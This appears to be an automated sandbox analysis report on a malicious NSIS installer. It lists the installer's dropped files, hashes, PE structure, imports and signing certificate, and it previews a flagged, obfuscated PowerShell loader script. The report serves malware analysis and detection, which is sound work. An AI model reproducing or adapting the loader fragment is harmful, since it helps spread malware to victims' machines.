                                                                          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):8003
                                                                          Entropy (8bit):4.840877972214509
                                                                          Encrypted:false
                                                                          SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                          MD5:106D01F562D751E62B702803895E93E0
                                                                          SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                          SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                          SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_juo4rwoj.wzk.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zm4bh3pc.eev.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\bhvB258.tmp

                                                                          Download File
                                                                          Process:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x517d4aba, page size 32768, DirtyShutdown, Windows version 10.0
                                                                          Category:dropped
                                                                          Size (bytes):15728640
                                                                          Entropy (8bit):0.10107804389042216
                                                                          Encrypted:false
                                                                          SSDEEP:1536:+SB2jpSB2jFSjlK/8w/ZweshzbOlqVqvesTPDDEJeszO/ZiBl7UgM:+a6a6Uueq2e7hQB6
                                                                          MD5:3BF40487309B2C4A181496C879E9E2C3
                                                                          SHA1:623509BE165A131B221959AE04D989F7AAB8F888
                                                                          SHA-256:3DE617F12E7AD9C25712C3C80589937A9EA347896C8E68ABE211429486114EDB
                                                                          SHA-512:E07E1910EE5AC0129BA359D7AF55E3D7A85E6957626D28D75441B29A92A399B803ED6E30248B4E7A7417CAFBE7DFB4ABDE45653763F615A04F60898C006B39FA
                                                                          Malicious:false
                                                                          Preview:Q}J.... ...................':...{........................Q.....&....{.......{..h.S.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{.....................................}.....{.6.........................{...........................#......h.S.....................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\coqd

                                                                          Download File
                                                                          Process:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):2
                                                                          Entropy (8bit):1.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:Qn:Qn
                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                          Malicious:false
                                                                          Preview:..

                                                                          C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):648112
                                                                          Entropy (8bit):7.802900575044087
                                                                          Encrypted:false
                                                                          SSDEEP:12288:UElGNmPCeBgjfiWxnlApvOvcrG7fhbL7TWxv69jIQS6lpOYCUjJ+i:5lGUPBBDulAxOErGLN7avBQTlpvCU3
                                                                          MD5:84E09BF944042FBD418724CDDB729516
                                                                          SHA1:8D908F01BE478390E49BFE51FBCA4959AF157E1F
                                                                          SHA-256:2263F87E66243B4F0D6B1BB79E0638C6556B5D89A2506AD9DB5C30CC02BBDCC3
                                                                          SHA-512:803912C31EF4E413D7B251FC400950ACA18AE522AC5A0B87D51A459182B112EDBCAD78B506A8CBE7C12EB18B5A4C2825B139107EDB7BD2DDA6BD18FE43421E78
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 47%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@..........................@............@.......................................... ..8...........(................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...p...............................rsrc...8.... ......................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe:Zone.Identifier

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                          C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\starveacre.sne

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):458489
                                                                          Entropy (8bit):1.2514812815887295
                                                                          Encrypted:false
                                                                          SSDEEP:1536:wPV4wdGoWBcvE3GXTAIjC+1saIdSyuPX:wPV4lBc83GjrG+5MSbP
                                                                          MD5:F26A9F263418DBF8C63A41C64B26F803
                                                                          SHA1:5496DBD5B53AE6367F95B7EC436F6E2D8C5C6F92
                                                                          SHA-256:E9EC9E640DE93A4632E48D142341DC8B4231DFE02D929D59394DD70CEE2D778E
                                                                          SHA-512:F1CD232CAFCD9715DEBA82FAEF429DB70A7EE15F4CB8E7B50ED434F22E957527279E45A4FA56CF41FAB3E27253DBAD447585669611BA73896D928EF61966AA3F
                                                                          Malicious:false
                                                                          Preview:...............v.........;......................{...............................................1.............................................................9......N.......w.......................................................................;................................................................................................................................n................................................-..............................'..%...........................................................................z........................D..................U........................!......_............?.......................9_..=..H............ni........n...............n..................................................................................zD.....|....T......................u..............8......i.......................................................................E.........U..............$....................|................................................

                                                                          C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\ukrudtsplanten.txt

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          File Type:ASCII text, with very long lines (397), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):397
                                                                          Entropy (8bit):4.262943766597649
                                                                          Encrypted:false
                                                                          SSDEEP:12:xTzwcVCuglUuBosmV4ig4KAjKUgwkIcUpF:xfNVCuglUWzmKHV2KUgfIhj
                                                                          MD5:55072E0E039D598FD4EC334E0E356295
                                                                          SHA1:142D468592E2DEB6E0759C8072D06D481412F426
                                                                          SHA-256:2A92F24A2EA3FE5966B686013D0AE786FB9BD20F9B7C2BF15E38047DE4CDEEDC
                                                                          SHA-512:E163DDD94CC05F21A934DAFFA4B5C4B65EAB85DB5560548A2DBA8671E7E10E0682E8C2688C63905BD9789E32AF22CBE737439701898CB824A73879C996EC9B5F
                                                                          Malicious:false
                                                                          Preview:svndrukne bersaglieri fortaelleren resocialiserende.suzannahs prefixally extraordinarily terebellidae reduviids alphabetizer skraldgrinet,nondeadly nebulousness alpinesque arveonkels retailors trichocephaliasis.weepable rekonstrueredes kamtakket slutnumrets klemmernes bruins subarian.bolsjestribet gypper eliminerings halfcocked jalousien oater.hermandine poloskjorte skovrig teodicsws semistate,

                                                                          C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\skyrens.laa

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):451652
                                                                          Entropy (8bit):1.2562993498096826
                                                                          Encrypted:false
                                                                          SSDEEP:768:NXg64WlRZ/+czu/YTBAfwTrBJ3nZ0eDhExv1zmXMc73OscbyFqgq7mOvPrL8gkAm:RYWpYrdAKZfSuf54YzNLs4iXv
                                                                          MD5:CB47D5ED57B3FF72E3FB8A8A4818434C
                                                                          SHA1:FF87F921390B2654206305CDF96403D951CBC01E
                                                                          SHA-256:9C1A6D51917CB5850A0B008EFE6FDD0D883F6981C96AF7BD774ED43236C5ACA0
                                                                          SHA-512:9E6C77BD3572F3C05FC404EF12669F07496FC4B5F1BF2A586F8330E29097B4089C2A405FA632DE1FF808EC1011987077E302691D43603876B4FF436EF69532FA
                                                                          Malicious:false
                                                                          Preview:......v.............................................................................(.............................................................................................;.g..............q................(.....................Y.......................................1........n....................................c.........................................|.w........B......................................e........./......H...................{K........................................................:.............N...............................................I.............t..............................................................G..w.......1........U...............................x.........................................7..................M.......P.eI....*...........Q........................................................................................................................................................................g......................................._.

                                                                          C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          File Type:ASCII text, with very long lines (54310), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):54310
                                                                          Entropy (8bit):5.35096851046208
                                                                          Encrypted:false
                                                                          SSDEEP:768:DZrQsb0w6o1/lJcZrtDBSarR6wYFwZ89D6YVs9XFnmSFHt0NfAP3muh1oKV49qtH:msb0wVlOZrWc690l5pFmovhLL31d
                                                                          MD5:255119688C7065754A83C8AB994DF0E0
                                                                          SHA1:60D2F2B79E0FF83F5A44EDEC89B296F989EFF2BB
                                                                          SHA-256:8289EFFE39FD7A273415735AAF3DDA665C94473B7C8B698A088886AC52B4EC72
                                                                          SHA-512:0D956E851A7DDC97906B79D82C412CF1D49D7954244BF0D2A780857C1E15BE0533862D9B88CE77C9F9DAB289D6BB1EB5528FF53DC780110FC788DC2EFF4E5F04
                                                                          Malicious:true
                                                                          Preview:$Subsept=$Erodibility;<#Albertine overdecorate Indolog Stningsbygningers michels Rigescent #><#Postsynchronisation Brdskrerne scribblative Anticnemion Temperatursvingningers Jiggle #><#Duumviral Calvadosernes Lovership #><#Undertoners Kabuli Antisupernaturalist #><#fierding Blabber Bdkers Brugerskarer Ringtoss Kildernes Brandbomber #><#Layered Ophjelsernes Slagtetider Mindretallenes distancering #>$Indstuderingers = "Argin; onv`$Tre iIBedsonNo cltOmplarMaledaSpi slcohanoOut ecgeneruK nful Sky aAnsttrTickerTidsidEksamkEsprenpropoiProctvv rkseDamesnstepheTakstsUnder1Pustu8Kotel9A iph=Lyrik`$DecidFMultiiXxiiid bechu Falss UndemBlaamaReliag PostebosporDrifti ,ikrsCarry;KlondfPa touFurronFysi,cE uoit Ovigi TeksostrycnAk ib K ltumHelaua RandkG aforPreseoBulgunjoges Banne( Khed`$UltraI Be inTambut Bogtr Misoauro epMealmeTn sttman giMasseoInseml.asteaFlagnrTmnin5,rwth3Siven,Ln.ry`$StopnI facinIndp.tMu,ker KonvaCyt nlChromoTamsvc Til uForb lVemodaC,ddirU der)Nonne c.ow{Halvf. tra `$RecapaUvil

                                                                          C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skillemnters.Bel

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):347597
                                                                          Entropy (8bit):7.671280993169929
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Ux/SsMS3fb9lLuxAlPNuNfpM13b/VoWDzQzF03fFuTHpNr+agwq+bBi4v:y9lKrdpGL/OWDczF03fFuVd+agwq+n
                                                                          MD5:6786D85D171F0A5872E24F5AE5D403A1
                                                                          SHA1:8DD2A7E274F4AB1B278350F373ABEB6AC540DB6B
                                                                          SHA-256:7DD49BAD8787A69B6AFC1AC6DB875CB9C0DA93990D6251F45B4FF6E88FDEBB6F
                                                                          SHA-512:02C69C706292C0E098E09E8C9B975FC746145B3EDC0330BFC0656512B250016AAC0DEB49501416DAB6CD0B79E927CD36FD0699A48AB90F67221097F7C38E86E1
                                                                          Malicious:false
                                                                          Preview:........d.......................x.bb....BB..bbb...............22...y..................................................................R........F.........]]........A......m.............................8..0....................LL......... .....{{{.....f..............:.....................99..e...I...d.."....www........................rrr.........j......ff....Q.................4...........................G.^^^....KK...L.........u......CCC.............^.........B.............MMMMM..MM.............uuu......Y...........MM.##.I..............%..............B.....==.......???.............###...........X.$$.Y.;;;.........+++....................vvvvv.MMM.i.a..``.K...T.h......V.................................&..l.......|......................................))...2..__..E./. .{{{{....:.........".j.....h..LLL.{................v..........._____../........*......................r.g............,,.......vv.....".....]......=.....ff.t.G.n....z.................PP...........;;;;;;;...................MMMMM

                                                                          C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\quadrifoil.tap

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):321416
                                                                          Entropy (8bit):1.252228082377907
                                                                          Encrypted:false
                                                                          SSDEEP:768:p4+c29AI3CPQXNEXt6QsTC3tMB/e0Vg+tlTf/Twl/1f1FNCnu2OaFf7YTYxX4taF:pdfAkTprVQp9SVFjOqvpmwN
                                                                          MD5:8836F785C1EB3F273C58CBF8C32D1D09
                                                                          SHA1:2BC2DA2E22A104F0FF30E1DD2A62E72246419608
                                                                          SHA-256:91C0B19CC1A646E9F22A0C73EFA9DDF4B1C0B1DCD18D59960CF41AF9852050F7
                                                                          SHA-512:2B78178D33F87E81FCAE76CE176C23C89AD78FC77012264D27A292365F183CEDB6008A480E33CB151F57E61C17969EF49BE87122DC694481653E70102714EA0A
                                                                          Malicious:false
                                                                          Preview:.7....................w............................................................q...................]..............E.........a...a..............>...................................h.........................................K.......a....D.....................U..0..........c......."........a................)..................................................u................................................................K..3.............................o........O...............z.......................s......................*......s....x........................8............d........................................................................................................................N.............x.....z..I....R......................Z......i.........C...R.........J...............................................g..............H...................................h......................e.................................E................................l............................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.802900575044087
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          File size:648'112 bytes
                                                                          MD5:84e09bf944042fbd418724cddb729516
                                                                          SHA1:8d908f01be478390e49bfe51fbca4959af157e1f
                                                                          SHA256:2263f87e66243b4f0d6b1bb79e0638c6556b5d89a2506ad9db5c30cc02bbdcc3
                                                                          SHA512:803912c31ef4e413d7b251fc400950aca18ae522ac5a0b87d51a459182b112edbcad78b506a8cbe7c12eb18b5a4c2825b139107edb7bd2dda6bd18fe43421e78
                                                                          SSDEEP:12288:UElGNmPCeBgjfiWxnlApvOvcrG7fhbL7TWxv69jIQS6lpOYCUjJ+i:5lGUPBBDulAxOErGLN7avBQTlpvCU3
                                                                          TLSH:39D402A0F290D8DFE89627B14C6DDC2115A76A4D94B0561F31967B2D7EF338310ABA0F
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*.....

                                                                          File Icon

                                                                          Icon Hash:6be6a4acc5ce5a6b

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x40333d
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:true
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x59759527 [Mon Jul 24 06:35:19 2017 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                          Authenticode Signature

                                                                          Signature Valid:false
                                                                          Signature Issuer:CN="Quadrantid Beslutsomste Troskyldigere ", O=Bizardite, L=Lustar, S=Occitanie, C=FR
                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                          Error Number:-2146762487
                                                                          Not Before, Not After
                                                                          • 05/02/2024 11:13:41 04/02/2027 11:13:41
                                                                          Subject Chain
                                                                          • CN="Quadrantid Beslutsomste Troskyldigere ", O=Bizardite, L=Lustar, S=Occitanie, C=FR
                                                                          Version:3
                                                                          Thumbprint MD5:006B7E3BAB2FC2862498F3C222F9A46C
                                                                          Thumbprint SHA-1:71B05D99C057481D036101FEA868635A56E13D3F
                                                                          Thumbprint SHA-256:CADCD1A1EA7418D62DFDA0F637C2782B3853AC02220E905F66DD3BB02A750F7C
                                                                          Serial:019D04BD639206BBB1DA18FE33181036279A8653

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          sub esp, 000002D4h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          pop edi
                                                                          xor ebx, ebx
                                                                          push 00008001h
                                                                          mov dword ptr [esp+14h], ebx
                                                                          mov dword ptr [esp+10h], 0040A2E0h
                                                                          mov dword ptr [esp+1Ch], ebx
                                                                          call dword ptr [004080A8h]
                                                                          call dword ptr [004080A4h]
                                                                          and eax, BFFFFFFFh
                                                                          cmp ax, 00000006h
                                                                          mov dword ptr [0042A20Ch], eax
                                                                          je 00007F8F8CE590E3h
                                                                          push ebx
                                                                          call 00007F8F8CE5C379h
                                                                          cmp eax, ebx
                                                                          je 00007F8F8CE590D9h
                                                                          push 00000C00h
                                                                          call eax
                                                                          mov esi, 004082B0h
                                                                          push esi
                                                                          call 00007F8F8CE5C2F3h
                                                                          push esi
                                                                          call dword ptr [00408150h]
                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                          cmp byte ptr [esi], 00000000h
                                                                          jne 00007F8F8CE590BCh
                                                                          push 0000000Ah
                                                                          call 00007F8F8CE5C34Ch
                                                                          push 00000008h
                                                                          call 00007F8F8CE5C345h
                                                                          push 00000006h
                                                                          mov dword ptr [0042A204h], eax
                                                                          call 00007F8F8CE5C339h
                                                                          cmp eax, ebx
                                                                          je 00007F8F8CE590E1h
                                                                          push 0000001Eh
                                                                          call eax
                                                                          test eax, eax
                                                                          je 00007F8F8CE590D9h
                                                                          or byte ptr [0042A20Fh], 00000040h
                                                                          push ebp
                                                                          call dword ptr [00408044h]
                                                                          push ebx
                                                                          call dword ptr [004082A0h]
                                                                          mov dword ptr [0042A2D8h], eax
                                                                          push ebx
                                                                          lea eax, dword ptr [esp+34h]
                                                                          push 000002B4h
                                                                          push eax
                                                                          push ebx
                                                                          push 004216A8h
                                                                          call dword ptr [00408188h]
                                                                          push 0040A2C8h

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x11338.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x9da280x988
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x626d0x6400b2dd5d917f94d75528a11411abe5681cFalse0.6569921875data6.423132440637118IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xa0000x203180x600c46c24ddc9bf88a6774bd207204164b9False0.4921875data3.906531854842304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .ndata0x2b0000x370000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x620000x113380x11400dcd2ec831c118d47b41581faab667a73False0.21158854166666666data4.256146131264858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x622080x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.1999585945818053
                                                                          RT_DIALOG0x72a300x100dataEnglishUnited States0.5234375
                                                                          RT_DIALOG0x72b300x11cdataEnglishUnited States0.6056338028169014
                                                                          RT_DIALOG0x72c500xc4dataEnglishUnited States0.5918367346938775
                                                                          RT_DIALOG0x72d180x60dataEnglishUnited States0.7291666666666666
                                                                          RT_GROUP_ICON0x72d780x14dataEnglishUnited States1.15
                                                                          RT_VERSION0x72d900x268MS Windows COFF Motorola 68000 object fileEnglishUnited States0.5048701298701299
                                                                          RT_MANIFEST0x72ff80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                          Imports

                                                                          DLLImport
                                                                          KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
